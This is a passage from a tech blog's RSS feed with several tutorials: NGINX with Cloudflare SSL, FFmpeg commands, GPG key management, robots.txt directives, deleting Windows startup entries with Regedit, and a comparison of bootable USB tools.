Now you need to allow web traffic through the firewall. The &apos;Nginx Full&apos; profile opens both port 80 (HTTP) and port 443 (HTTPS). Run the following command:

```bash
sudo ufw allow &apos;Nginx Full&apos;
```

and reload the ufw firewall:

```bash
sudo ufw reload
```

This step ensures that your NGINX server can receive traffic.
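You can confirm the rule took effect with `sudo ufw status`. The output should list the &apos;Nginx Full&apos; profile, roughly like this:

```plaintext
Status: active

To                         Action      From
--                         ------      ----
Nginx Full                 ALLOW       Anywhere
Nginx Full (v6)            ALLOW       Anywhere (v6)
```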

## Adding SSL/TLS Encryption with Cloudflare

Now that you&apos;ve set up NGINX to serve your website, it&apos;s time to enhance security by encrypting the connection between your server and visitors&apos; browsers using SSL/TLS. Cloudflare offers a convenient way to manage SSL/TLS certificates and provides additional security features like DDoS protection and web application firewall (WAF). Follow these steps to integrate Cloudflare with your NGINX server:

### Step 6: Sign Up for Cloudflare and Add Your Website

If you haven&apos;t already, sign up for a Cloudflare account and add your website to the dashboard. Cloudflare will guide you through the process of updating your domain&apos;s DNS settings to point to their servers.

### Step 7: Select SSL/TLS Encryption Mode

Navigate to the SSL/TLS section in your Cloudflare dashboard and select the &quot;Overview&quot; tab. Choose the encryption mode that best suits your needs. For maximum security, we recommend selecting &quot;Full (strict)&quot; mode, which ensures end-to-end encryption between Cloudflare and your origin server.

### Step 8: Generate an Origin Certificate

Cloudflare provides free SSL/TLS certificates, known as Origin Certificates, for securing the connection between Cloudflare and your origin server. Follow these steps to generate an Origin Certificate:

1. Log in to your Cloudflare dashboard.
2. Go to the SSL/TLS section and click on &quot;Origin Certificates.&quot;
3. Select the appropriate options, such as the private key type (RSA 2048), hostnames, and certificate validity period.
4. Click &quot;Create Certificate&quot; to generate the certificate.

### Step 9: Install Origin Certificate on Your Server

Once you&apos;ve generated the Origin Certificate, you need to install it on your NGINX server. SSH into your server and follow these steps:

1. Create the Origin Certificate file:

```bash
sudo vim /etc/ssl/cert.pem
```

2. Paste the Origin Certificate into the file and save it.

3. Create the Private Key file:

```bash
sudo vim /etc/ssl/key.pem
```

4. Paste your Private Key into the file and save it.

### Step 10: Update NGINX Configuration

Update your NGINX configuration file to use the installed SSL/TLS certificates. Open/Create the configuration file:

```bash
sudo vim /etc/nginx/conf.d/yoursite_me.conf
```

Replace the SSL certificate and key paths with the paths to your Origin Certificate and Private Key files, and make sure the `server_name` matches your domain:

```conf
server {
  listen 443 ssl http2;
  listen [::]:443 ssl http2;

  ssl_certificate       /etc/ssl/cert.pem;
  ssl_certificate_key   /etc/ssl/key.pem;

  location / {
          try_files $uri $uri/ =404;
  }

  server_name yoursite.me www.yoursite.me;

  root /var/www/yoursite_me/html;
  index index.html;
}
```
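The server block above only listens on port 443, so plain HTTP requests would go unanswered. If you want HTTP traffic redirected to HTTPS, you can add a second server block next to it; this is a minimal sketch that assumes your domain is `yoursite.me`:

```conf
server {
  listen 80;
  listen [::]:80;

  server_name yoursite.me www.yoursite.me;

  # Send all plain-HTTP requests to the HTTPS version of the same URL
  return 301 https://$host$request_uri;
}
```

Note that if you enable Cloudflare&apos;s &quot;Always Use HTTPS&quot; setting, Cloudflare performs this redirect at the edge and the block becomes optional.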

### Step 11: Test and Restart NGINX

Before proceeding, test your NGINX configuration to ensure there are no syntax errors:

```bash
sudo nginx -t
```

If the test is successful, restart NGINX to apply the changes:

```bash
sudo systemctl restart nginx
```

### Step 12: Verify Cloudflare Settings

Finally, return to your Cloudflare dashboard and verify that SSL/TLS encryption mode is set to &quot;Full (strict)&quot; to enforce secure communication between Cloudflare and your NGINX server.

With these steps completed, your website is now securely encrypted with SSL/TLS, providing enhanced security and privacy for your visitors.

## References

- [How To Host a Website Using Cloudflare and Nginx on Ubuntu 22.04](https://www.digitalocean.com/community/tutorials/how-to-host-a-website-using-cloudflare-and-nginx-on-ubuntu-22-04)
- [How To Install Nginx on Ubuntu 22.04](https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-22-04#step-5-setting-up-server-blocks-recommended)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Comprehensive Guide for FFmpeg</title><link>https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-commands/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-commands/</guid><description>Explore essential commands and techniques for FFmpeg</description><pubDate>Sun, 10 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the world of multimedia processing, FFmpeg stands as a versatile and powerful tool that enables you to manipulate audio and video files in countless ways. Whether you&apos;re a professional video editor, a streaming enthusiast, or just someone who wants to tinker with multimedia files, FFmpeg is your go-to solution. In this blog post, we will delve into the fundamentals of FFmpeg and explore some common commands to get you started on your multimedia journey.

### What is FFmpeg?

FFmpeg is an open-source software suite that provides a collection of multimedia libraries and tools to work with audio and video files. It allows you to convert, edit, stream, and record audio and video content from various sources. FFmpeg is used by both professionals and hobbyists alike for a wide range of multimedia tasks.

## Installation

Before you can start using FFmpeg, you need to install it on your system. Installation methods vary depending on your operating system. For Linux, you can use your package manager:

```bash
sudo apt install ffmpeg  # On Debian/Ubuntu
sudo pacman -S ffmpeg  # On Arch
```

## Basic FFmpeg Commands

Here are some common commands for daily use.

### 1. **Merging Video and Audio**

**Scenario 1:** Copy Video and Encode Audio to AAC Format

```bash
ffmpeg -i video.mp4 -i audio.wav -c:v copy -c:a aac output.mp4
```

- `-i video.mp4` specifies the input video file.
- `-i audio.wav` specifies the input audio file.
- `-c:v copy` copies the video codec without re-encoding.
- `-c:a aac` encodes the audio using the AAC codec.
- `output.mp4` is the output file with merged video and audio.

**Scenario 2:** Copy Both Video and Audio Streams into MKV Container

```bash
ffmpeg -i video.mp4 -i audio.wav -c copy output.mkv
```

- `-c copy` copies both video and audio streams without re-encoding.
- `output.mkv` is the output file with merged video and audio.

**Scenario 3:** Copy Video and Encode Audio with Explicit Input Streams

```bash
ffmpeg -i video.mp4 -i audio.wav -c:v copy -c:a aac -map 0:v:0 -map 1:a:0 output.mp4
```

- `-map 0:v:0` selects the video stream from the first input (`0:v:0`).
- `-map 1:a:0` selects the audio stream from the second input (`1:a:0`).

### 2. **Converting HLS to MP4**

HLS (HTTP Live Streaming) is a common streaming format. If you have an HLS stream and want to convert it to the MP4 format, use the following command:

```bash
ffmpeg -i file.m3u8 -c copy file.mp4
```

- `-i file.m3u8` specifies the input HLS stream.
- `-c copy` copies the streams without re-encoding.
- `file.mp4` is the output MP4 file.
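If you have a directory full of playlists, the same command can be generated for each file with a small helper. This is a sketch (the `hls_to_mp4_cmd` function is a made-up name for illustration); it prints each ffmpeg command instead of running it, so you can review the commands before executing them:

```shell
# Print the ffmpeg command that would convert one HLS playlist to MP4.
hls_to_mp4_cmd() {
  local input="$1"
  # Swap the .m3u8 extension for .mp4 to derive the output name
  local output="${input%.m3u8}.mp4"
  printf 'ffmpeg -i %s -c copy %s\n' "$input" "$output"
}

# Build the command for every playlist in the current directory
for f in ./*.m3u8; do
  [ -e "$f" ] || continue  # skip when no playlists are present
  hls_to_mp4_cmd "$f"
done
```

Pipe the output to `sh` (or drop the `printf` wrapper) once the commands look right.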

### 3. **Creating a Video with a Cover Image**

If you want to add a cover image to an existing video by muxing the image in as the leading video stream, use this command:

```bash
ffmpeg -i &quot;input.mp4&quot; -i &quot;cover.jpg&quot; -map 1 -map 0 -acodec copy -vcodec copy &quot;output_with_cover.mp4&quot;
```

- `-i &quot;input.mp4&quot;` specifies the input video.
- `-i &quot;cover.jpg&quot;` specifies the cover image.
- `-map 1` maps the second input (the image) first, so it becomes the leading video stream.
- `-map 0` maps the streams of the first input (the original video and audio).
- `-acodec copy` copies the audio codec without re-encoding.
- `-vcodec copy` copies the video codec without re-encoding.
- `&quot;output_with_cover.mp4&quot;` is the output video file.

### 4. **Extracting Frames from a Video**

To extract frames from a video at a specific timestamp, you can use the following commands:

**Scenario 1:** Extract a Single Frame at 10 Seconds into the Video

```bash
ffmpeg -i inputvideo.mp4 -ss 00:00:10 -frames:v 1 screenshot.jpg
```

- `-ss 00:00:10` specifies the timestamp (10 seconds).
- `-frames:v 1` indicates that you want to extract one frame.
- `screenshot.jpg` is the output image file.

**Scenario 2:** Extract Multiple Frames

```bash
ffmpeg -i inputvideo.mp4 -ss 00:00:10 -frames:v 50 screenshots_%03d.jpg
```

- `-ss 00:00:10` specifies the starting timestamp (10 seconds).
- `-frames:v 50` indicates that you want to extract 50 frames.
- `screenshots_%03d.jpg` generates multiple output image files with sequential numbering (e.g., `screenshots_001.jpg`, `screenshots_002.jpg`, ...).

## Conclusion

With FFmpeg and its extensive capabilities, you can manipulate audio and video files in many ways, from simple tasks like merging audio and video to more complex operations like format conversion and frame extraction.

**GPG**, or **GNU Privacy Guard**, is a powerful open-source encryption software that provides cryptographic privacy and authentication for data communication. GPG keys play a central role in GPG&apos;s functionality, enabling secure communication and verification of data integrity. In this guide, we&apos;ll explore GPG keys and how to manage, import, delete, list, and verify them.

## What Are GPG Keys?

At its core, GPG uses a pair of keys to secure your data: the **public key** and the **private key**. These keys are mathematically related but serve different purposes:

- **Public Key**: This key is used to encrypt data and verify digital signatures. It can be shared openly with others.
- **Private Key**: This key is used to decrypt data and create digital signatures. It must be kept secret and should never be shared.

## Importing GPG Keys

Importing GPG keys is essential for establishing trust with other users and organizations. It allows you to verify data they&apos;ve signed and encrypt data specifically for them. To import a GPG key, you can use the `gpg --import` command:

```shell
gpg --import mykey.asc
```

This command imports a GPG key from the `mykey.asc` file into your keyring.
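A successful import prints a short confirmation along these lines (the key ID and user ID are illustrative):

```plaintext
gpg: key 0xDEADBEEF: public key &quot;John Doe &lt;john@example.com&gt;&quot; imported
gpg: Total number processed: 1
gpg:               imported: 1
```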

## Listing GPG Keys

Managing keys efficiently involves keeping track of them. To list your GPG keys, use the `gpg --list-keys` and `gpg --list-secret-keys` commands:

```shell
gpg --list-keys
```

This command displays a list of your public keys:

```plaintext
pub   rsa2048/0xDEADBEEF 2018-01-01
uid                  John Doe &lt;john@example.com&gt;
sub   rsa2048/0xC0FFEE01 2018-01-01
```

The output shows the key ID, key type (RSA), creation date, user ID, and any subkeys.

```shell
gpg --list-secret-keys
```

This command lists your secret (private) keys.

## Deleting GPG Keys

If you need to remove a GPG key from your keyring, use the `gpg --delete-key` command followed by the key&apos;s ID:

```shell
gpg --delete-key DEADBEEF
```

Replace `DEADBEEF` with the actual key ID.

## Verifying Signatures with GPG

GPG allows you to verify the authenticity and integrity of files and messages by checking their digital signatures. To verify a signature, use the `gpg --verify` command:

```shell
gpg --verify file.tar.gz.sig
```

This command verifies the signature on the `file.tar.gz` archive using the associated `.sig` file.
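If the signature is valid and you have the signer&apos;s public key, gpg reports something like the following (the date, key ID, and user ID are illustrative):

```plaintext
gpg: Signature made Wed 06 Sep 2023 10:00:00 AM UTC
gpg:                using RSA key DEADBEEF
gpg: Good signature from &quot;John Doe &lt;john@example.com&gt;&quot;
```

If the file was tampered with, you would instead see a &quot;BAD signature&quot; error.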

## Receiving Keys from a Key Server

When you need someone&apos;s public key for secure communication, you can retrieve it from a key server using `gpg --recv-key`:

```shell
gpg --recv-key DEADBEEF
```

Replace `DEADBEEF` with the key ID of the key you want to retrieve. GPG will fetch the key from a key server and add it to your keyring.

## Conclusion

GPG keys are the foundation of secure communication and data authentication. In this guide, we covered how to manage, import, list, delete, and verify them.

In the vast landscape of the internet, search engines are the navigators, helping users discover websites and content. However, not every website owner wants search engines to freely roam their digital domain. This is where the robots.txt file, with its &quot;Allow&quot; and &quot;Disallow&quot; directives, comes into play, offering webmasters a powerful tool for controlling how search engine crawlers interact with their sites.

In this comprehensive guide, we will delve into the world of controlling search engine crawlers using the robots.txt file&apos;s &quot;Allow&quot; and &quot;Disallow&quot; directives. You&apos;ll learn what it is, why it&apos;s essential, and how to implement it effectively to regulate search engine access to your web content.

## What is Robots.txt?

At its core, the robots.txt file is a simple but powerful tool that website owners use to communicate with web crawlers, also known as spiders or bots. These automated programs, employed by search engines like Google, Bing, and others, traverse the web, indexing web pages to make them searchable.

The robots.txt file serves as a set of instructions for these crawlers. It tells them which parts of a website are open for exploration and indexing (using &quot;Allow&quot;) and which should remain off-limits (using &quot;Disallow&quot;). In essence, it acts as both a &quot;Welcome&quot; and a &quot;No Entry&quot; sign for certain areas of your website.

To create and manage a robots.txt file, you don&apos;t need to be a coding wizard. It&apos;s a plain text file that sits at the root directory of your website, and you can create or edit it with a simple text editor.
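As a starting point, a minimal robots.txt that allows all crawlers everywhere looks like this (the optional `Sitemap` line points crawlers at your sitemap; replace the URL with your own):

```plain
User-agent: *
Disallow:

Sitemap: https://yourwebsite.com/sitemap.xml
```

An empty `Disallow:` value means nothing is blocked.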

### Why Is This Control Necessary?

By default, even if you haven&apos;t explicitly added your site to a search engine, web crawlers can autonomously find and index your public domain. This can lead to undesired visibility or indexing of confidential information.

### Why You Might Want to Use &quot;Disallow&quot;

The internet is a vast, interconnected ecosystem where privacy, security, and content control matter. Here are some compelling reasons why you might want to use the &quot;Disallow&quot; directive to block search engines from crawling specific parts of your website:

- **Private or Restricted Content**: You have sections of your site that are intended for specific users only, and you want to keep them hidden from search engine indexing.

- **Staging or Development Sites**: You may have staging or development versions of your site that you don&apos;t want appearing in search results.

## Implementing &quot;Allow&quot; and &quot;Disallow&quot; in Robots.txt

Now that we understand why you might want to use &quot;Disallow&quot; to block a search engine, let&apos;s explore how to use both &quot;Allow&quot; and &quot;Disallow&quot; effectively in your robots.txt file:

1. **Locate Your Robots.txt File**: Find the robots.txt file at the root directory of your website. For example, it&apos;s accessible at `https://yourwebsite.com/robots.txt`.

2. **Choose User Agents**: Decide which search engine bots you want to allow or block. The User-agent directive specifies the bot you&apos;re addressing.

3. **Set &quot;Disallow&quot; Rules**: Use the &quot;Disallow&quot; directive to specify the URLs or directories you want to block for the chosen user agent.

4. **Set &quot;Allow&quot; Rules**: Use the &quot;Allow&quot; directive to specify exceptions to the &quot;Disallow&quot; rules, allowing certain parts of your site to be crawled by search engines.

### Example: Allowing and Disallowing with Robots.txt

You can further refine your control over search engine access by using both &quot;Allow&quot; and &quot;Disallow&quot; directives. Here&apos;s an example:

```plain
User-agent: Googlebot
Disallow: /private/
Allow: /public/
```

- `User-agent: Googlebot` specifies that these rules apply specifically to Google&apos;s search engine bot.

- `Disallow: /private/` tells Googlebot not to access the &quot;/private/&quot; directory.

- `Allow: /public/` provides an exception, allowing Googlebot to access the &quot;/public/&quot; directory, even though it falls under the broader &quot;Disallow&quot; rule.

By combining &quot;Allow&quot; and &quot;Disallow&quot; directives, you can fine-tune access control for different search engines or specific parts of your site.

### Example: Blocking Everything with Robots.txt

In some cases, you might want to prevent all search engines from crawling and indexing your entire website. This is a drastic step, but it can be useful for specific scenarios, such as when you&apos;re working on a development version of your site and don&apos;t want it to appear in search results. Here&apos;s how you can achieve this by blocking everything using robots.txt:

```plain
User-agent: *
Disallow: /
```

In this example:

- `User-agent: *` specifies that these rules apply to all web crawlers.

- `Disallow: /` is the directive that tells all web crawlers to stay away from your entire site. The forward slash &quot;/&quot; represents the root directory, so &quot;Disallow: /&quot; effectively blocks access to the entire website.

Please use this directive with caution, as it will make your entire site inaccessible to search engines. Only use it temporarily and in situations where you have a specific need to keep your site out of search engine results. Be sure to remove or modify this rule when you want your site to be indexed again.
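
Conversely, to explicitly allow every crawler access to the whole site, give &quot;Disallow&quot; an empty value:

```plain
User-agent: *
Disallow:
```

An empty &quot;Disallow&quot; directive matches nothing, so no URL is blocked; the effect is the same as having no robots.txt file at all.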

### Example: Specifying Rules for Googlebot

If you want to specify rules for Googlebot specifically, you can use the following example:

```plain
User-agent: Googlebot
Disallow: /private/
```

- `User-agent: Googlebot` specifies that these rules apply only to Google&apos;s search engine bot.

- `Disallow: /private/` tells Googlebot not to access the &quot;/private/&quot; directory.

You can customize these rules to control how Googlebot interacts with your website.

### Example: Specifying Rules for Bingbot

To specify rules for Bingbot, Microsoft&apos;s search engine bot, you can use a similar approach:

```plain
User-agent: Bingbot
Disallow: /restricted/
Allow: /public/
```

- `User-agent: Bingbot` specifies that these rules apply specifically to Bingbot.

- `Disallow: /restricted/` instructs Bingbot not to access the &quot;/restricted/&quot; directory.

- `Allow: /public/` explicitly permits Bingbot to crawl the &quot;/public/&quot; directory, overriding any broader rule that would otherwise block it.

## Using `noindex, nofollow` to Disallow Crawling

While the `robots.txt` file is effective for controlling search engine access to entire directories or sections of your website, you might want to exert more granular control over individual web pages. To achieve this level of control, you can use the `noindex, nofollow` meta tag within the HTML of specific pages.

Here&apos;s how to use the `noindex, nofollow` meta tag:

1. **Locate the HTML `&lt;head&gt;` Section**: Open the HTML file of the page you want to block search engines from indexing and locate the `&lt;head&gt;` section within the HTML document.

2. **Insert the Meta Tag**: Inside the `&lt;head&gt;` section, add the following meta tag:

   ```html
   &lt;meta name=&quot;robots&quot; content=&quot;noindex, nofollow&quot; /&gt;
   ```

   This meta tag instructs search engine crawlers not to index the page (`noindex`) and not to follow any links on it (`nofollow`), keeping the page out of search engine results.

3. **Save and Update**: Save the changes to your HTML file and upload it to your web server if necessary.

4. **Verify the Meta Tag**: To ensure that the `noindex, nofollow` meta tag has been correctly implemented, you can inspect the HTML source code of the page after it&apos;s live on your server. Right-click on the page in your web browser and select &quot;View Page Source&quot; or use the browser&apos;s developer tools to inspect the page&apos;s HTML source. Look for the presence of the meta tag within the `&lt;head&gt;` section.

Using the `noindex, nofollow` meta tag is particularly useful when you want to block individual pages from being indexed while allowing the rest of your website to be accessible to search engine crawlers. It&apos;s a versatile tool for fine-tuning your website&apos;s visibility and ensuring that specific content remains private or hidden from search engine results.

Remember that the `robots.txt` file blocks access at the crawling stage, while the `noindex, nofollow` meta tag controls indexing and link-following on pages that crawlers can actually reach. One caveat: if `robots.txt` blocks a page, crawlers never see its `noindex` tag, so a page you want removed from the index should remain crawlable until it has dropped out of search results.

## Verifying Your Robots.txt Configuration

After you&apos;ve created or modified your robots.txt file, it&apos;s crucial to verify its configuration to ensure it&apos;s working as intended. Here&apos;s how you can do it:

1. **Upload the Robots.txt File**: First, upload the robots.txt file to the root directory of your web server. You can access it by visiting `https://yourdomain.com/robots.txt`.

2. **Check the Content**: When you access this URL, you should see the content of your robots.txt file displayed in your web browser. This confirms that the file has been correctly uploaded and is accessible to both humans and web crawlers.
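
You can also fetch the file from a terminal to confirm it is being served (replace the domain with your own):

```plain
curl https://yourdomain.com/robots.txt
```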

### Waiting for Search Engine Bot Action

Once your robots.txt file is uploaded and accessible, you&apos;ll need to be patient as search engine bots process the changes. Here&apos;s what to expect:

1. **Monitoring and Waiting**: After you&apos;ve uploaded the robots.txt file, you&apos;ll need to be patient. It may take a few days or more for search engine bots to discover and process your updated robots.txt file. During this period, the bots will continue to crawl your site based on their previous instructions.

2. **Updates to Search Results**: Once the search engine bots have processed the new robots.txt file, they will update their indexing accordingly. This means that any URLs or directories you&apos;ve disallowed in the robots.txt file will eventually be removed from search engine results, and any new instructions will be implemented.

3. **Consider Submitting a Sitemap**: To help search engines better understand the structure of your website, you can also consider submitting a sitemap through search engine webmaster tools. This can expedite the indexing process and ensure that your site&apos;s content is accurately represented in search results.

Remember that changes to your robots.txt file can take some time to propagate across search engines, so it&apos;s essential to be patient and monitor the results over time to ensure that your website&apos;s visibility aligns with your intentions.

## Checking for Removal of Blocked Pages

Once you&apos;ve implemented changes to your robots.txt file to block specific pages or directories from search engine indexing, you&apos;ll want to confirm that the changes have taken effect on both Google and Bing. Here&apos;s how to do it:

### Checking with Google Search Engine

1. **Visit Google.com**: Open your web browser and visit the Google search engine at [Google.com](https://www.google.com/).

2. **Use the &quot;site:&quot; Operator**: In the Google search bar, enter the following command, replacing &quot;yourdomain.com&quot; with your actual domain name:

   ```plain
   site:yourdomain.com
   ```

   This command tells Google to search specifically for pages indexed from your website.

3. **Review the Search Results**: After executing the search, review the search results. Pay attention to whether the pages or directories you&apos;ve blocked in your robots.txt file still appear in the search results.

   - If the blocked pages are no longer listed, it indicates that Google has successfully removed them from its index, and your robots.txt directives are working as intended.

   - If the blocked pages still appear in the search results, it may take more time for Google to process the changes fully. Be patient and continue monitoring the results.

### Checking with Bing Search Engine

1. **Visit Bing.com**: Open your web browser and visit the Bing search engine at [Bing.com](https://www.bing.com/).

2. **Use the &quot;site:&quot; Operator**: In the Bing search bar, enter the following command, replacing &quot;yourdomain.com&quot; with your actual domain name:

   ```plain
   site:yourdomain.com
   ```

   This command tells Bing to search specifically for pages indexed from your website.

3. **Review the Search Results**: After executing the search, review the search results. Pay attention to whether the pages or directories you&apos;ve blocked in your robots.txt file still appear in the search results.

   - If the blocked pages are no longer listed, it indicates that Bing has successfully removed them from its index, and your robots.txt directives are working as intended.

   - If the blocked pages still appear in the search results, it may take more time for Bing to process the changes fully. Be patient and continue monitoring the results.

This method provides a quick and accessible way to verify that both Google and Bing search engines have respected your robots.txt directives and removed blocked content from their search results. Remember that it may take some time for changes to propagate across search engines, so periodic checks can help ensure that your website&apos;s privacy and content control are maintained.

## Conclusion

Controlling search engine crawlers with the robots.txt file&apos;s &quot;Allow&quot; and &quot;Disallow&quot; directives is a fundamental aspect of managing your website&apos;s visibility and content accessibility. Whether you&apos;re safeguarding private sections, conserving resources, or optimizing your SEO, this tool empowers you to take charge of how search engines interact with your web domain. By understanding and effectively implementing the &quot;Allow&quot; and &quot;Disallow&quot; directives, you can navigate the digital landscape with confidence and control.

## References

- [How to Use Robots.txt to Allow or Disallow Everything - searchfacts](https://searchfacts.com/robots-txt-allow-disallow-all/)
- [How to Use Robots.txt to Allow or Disallow Everything - V DIGITAL SERVICES BLOG](https://www.vdigitalservices.com/how-to-use-robots-txt-to-allow-or-disallow-everything/)
- [How to Block Search Engines Using robots.txt disallow Rule](https://www.hostinger.com/tutorials/website/how-to-block-search-engines-using-robotstxt)
- [robots.txt to disallow all pages except one? Do they override and cascade?](https://stackoverflow.com/questions/19869004/robots-txt-to-disallow-all-pages-except-one-do-they-override-and-cascade)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Managing Your Windows Startup Programs with Regedit</title><link>https://ummit.dev//posts/windows/regedit/how-to-delete-startup-program-with-regedit/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/regedit/how-to-delete-startup-program-with-regedit/</guid><description>In the Windows world, to delete startup programs you need to use a tool called regedit, we&apos;ll explain how to use this tool to delete your unwanted behavior!</description><pubDate>Mon, 04 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Your computer’s startup programs can significantly impact its performance and boot time. Sometimes, you might want to remove unnecessary or unwanted startup programs to optimize your system. While there are user-friendly methods to manage startup programs, using the Windows Registry Editor (Regedit) provides a more advanced and granular level of control without installing any third-party software. In this guide, we’ll walk you through the process of using Regedit to delete startup programs from your Windows PC.

## What Is Regedit?

The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. Regedit is the built-in registry editor that allows users to view, edit, and manipulate this database. It&apos;s a powerful tool often used by advanced users and IT professionals to make changes to the Windows operating system and installed applications.

## Why Remove Startup Programs?

Startup programs are applications or scripts that launch automatically when your computer boots up. While some of these programs are essential for system functionality, others can slow down your PC&apos;s startup and overall performance. Here are some reasons why you might want to remove startup programs:

1. **Improved Boot Time:** Fewer startup programs mean a faster boot time, allowing you to start using your computer more quickly.

2. **Resource Efficiency:** Unnecessary startup programs consume system resources like CPU and memory, potentially causing slowdowns.

3. **Reduced Clutter:** A cluttered startup can make it difficult to find and focus on the programs you need.

Now, let&apos;s dive into the steps for using Regedit to delete startup programs.

## Deleting Startup Programs with Regedit

**Note: Editing the Windows Registry can have unintended consequences if not done correctly. It&apos;s essential to follow these steps carefully and make a backup of your registry before making any changes.**

1. **Open Regedit:** Press `Win + R` to open the Run dialog, type `regedit`, and press Enter. This will open the Registry Editor.

2. **Navigate to the Startup Key:** In the left-hand pane of the Registry Editor, navigate to the following key:
   ```plain
   Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   ```
   This key contains entries for startup programs that apply to all users of the computer. Entries that apply only to the current user live under the same path beneath `HKEY_CURRENT_USER` instead.

3. **Identify the Program:** In the right-hand pane, you&apos;ll see a list of entries. Each entry represents a startup program. To identify the program you want to delete, look at the &quot;Data&quot; column, which contains the file path or command for the program.

4. **Delete the Entry:** Right-click on the entry you want to remove and select &quot;Delete.&quot; Confirm the deletion if prompted.

![delete](https://static1.makeuseofimages.com/wordpress/wp-content/uploads/2022/03/delete-option.png?q=50&amp;fit=crop&amp;w=1500&amp;dpr=1.5)

5. **Repeat as Needed:** If you want to remove multiple startup programs, repeat steps 3 and 4 for each one.

6. **Close Regedit:** Once you&apos;ve deleted the desired entries, close the Registry Editor.

7. **Restart Your Computer:** To apply the changes, restart your computer.
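
If you prefer the command line, the same inspection, backup, and deletion can be done with the built-in `reg` tool from an elevated Command Prompt (the value name `ExampleApp` below is a placeholder):

```plain
:: List startup entries for all users
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

:: Back up the key before changing anything
reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run-backup.reg

:: Delete a single entry (replace ExampleApp with the value name to remove)
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ExampleApp /f
```

The exported `run-backup.reg` file can be double-clicked later to restore the deleted entries.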

## Verifying Changes

After restarting your computer, the deleted startup programs should no longer launch automatically. You can verify this by checking the Task Manager&apos;s Startup tab or using a third-party startup manager tool. If you encounter any issues or unintended consequences, you can use the backup of your registry to restore the deleted entries.

## Conclusion

Using Regedit to delete startup programs gives you precise control over your computer&apos;s boot process and resource usage. However, it&apos;s essential to exercise caution when editing the Windows Registry, as incorrect changes can lead to system instability. With this guide, you now have the knowledge to manage your PC&apos;s startup programs effectively and optimize its performance.

## Reference

- [7 Ways to Disable Startup Programs in Windows 11](https://www.makeuseof.com/windows-11-disable-startup-programs/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Exploring Some Bootable USB Tools: What are they different?</title><link>https://ummit.dev//posts/others/bootable-usb-tools/</link><guid isPermaLink="true">https://ummit.dev//posts/others/bootable-usb-tools/</guid><description>Discover the distinctions between various bootable USB tools and find the right one for your needs. including YUMI, Rufus and BalenaEtcher.</description><pubDate>Sun, 03 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the realm of modern computing, the humble USB drive has taken on an incredible new role: that of a portable operating system. Thanks to a collection of versatile tools known as bootable USB creators, you can now carry an entire operating system, recovery toolkit, or diagnostic suite in your pocket. Today, we&apos;re going to dive into the world of bootable USB tools, exploring their features and functions. Whether you&apos;re a Windows enthusiast or a dedicated Linux user, we&apos;ve got you covered.

### Rufus: The Popular Choice

**Rufus** is a well-known and highly regarded bootable USB tool, primarily designed for Windows users. It&apos;s known for its simplicity, speed, and reliability. Here&apos;s what makes Rufus stand out:

- **Speed:** Rufus is known for its blazing-fast write speeds. It efficiently burns ISO images onto USB drives, making it ideal for quickly creating bootable media.

- **Compatibility:** Although Rufus itself runs only on Windows, it handles Linux distribution images just as well. It supports various image formats, including ISO, DD, and more.

- **Partition Schemes:** Rufus supports multiple partition schemes, including MBR (Master Boot Record) and GPT (GUID Partition Table), allowing you to create bootable media for both legacy BIOS and modern UEFI systems.

- **Open source:** Rufus is free and open-source software; the source code is available [here](https://github.com/pbatard/rufus).

![Rufus](https://rufus.ie/pics/screenshot1_en.png)

### YUMI: Your Multiboot Solution

**YUMI (Your Universal Multiboot Installer)** is another valuable tool in the bootable USB arsenal. It excels at creating multiboot USB drives, making it possible to carry multiple operating systems or tools on a single USB stick. Here&apos;s why YUMI is popular:

- **Multiboot Support:** YUMI&apos;s standout feature is its ability to create a multiboot USB drive. This means you can have several Linux distributions, Windows installations, and diagnostic tools all on one USB stick.

- **Persistence:** YUMI supports creating persistent partitions, which allow you to save changes and data across reboots. This is particularly useful for creating portable Linux installations.

- **User-Friendly:** YUMI&apos;s interface is user-friendly and easy to navigate, making it a great choice for those new to creating bootable USB drives.

- **Open source:** YUMI is free and open-source software. Its source code is not published on a public Git host; downloads are available only from the official page, [here](https://www.pendrivelinux.com/yumi-multiboot-usb-creator/).

![YUMI](https://www.pendrivelinux.com/wp-content/uploads/YUMI-exFAT-USB-Boot.jpg)

### BalenaEtcher: The Cross-Platform Tool

**BalenaEtcher**, often simply referred to as Etcher, stands out as a cross-platform bootable USB tool. Whether you&apos;re using macOS, Linux, or Windows, Etcher has you covered. Here&apos;s why it&apos;s worth considering:

- **Cross-Platform:** Etcher supports macOS, Linux, and Windows, making it an excellent choice for users who work across multiple operating systems.

- **User-Friendly:** Etcher boasts a clean and intuitive interface, making it easy for beginners and experienced users alike. It&apos;s a &quot;one-click&quot; solution for creating bootable USB drives.

- **SD Card Support:** In addition to USB drives, Etcher can also write images to SD cards, which is handy for creating bootable cards for Raspberry Pi and other single-board computers.

- **Security:** Etcher ensures data integrity by verifying written data, reducing the chances of corrupted bootable media.

![BalenaEtcher](https://assets.website-files.com/636ab6ba0e1bd250e3aaedaf/6384b014d54e42138163c455_etcherPro_SPEED-p-800.webp)

## In Conclusion

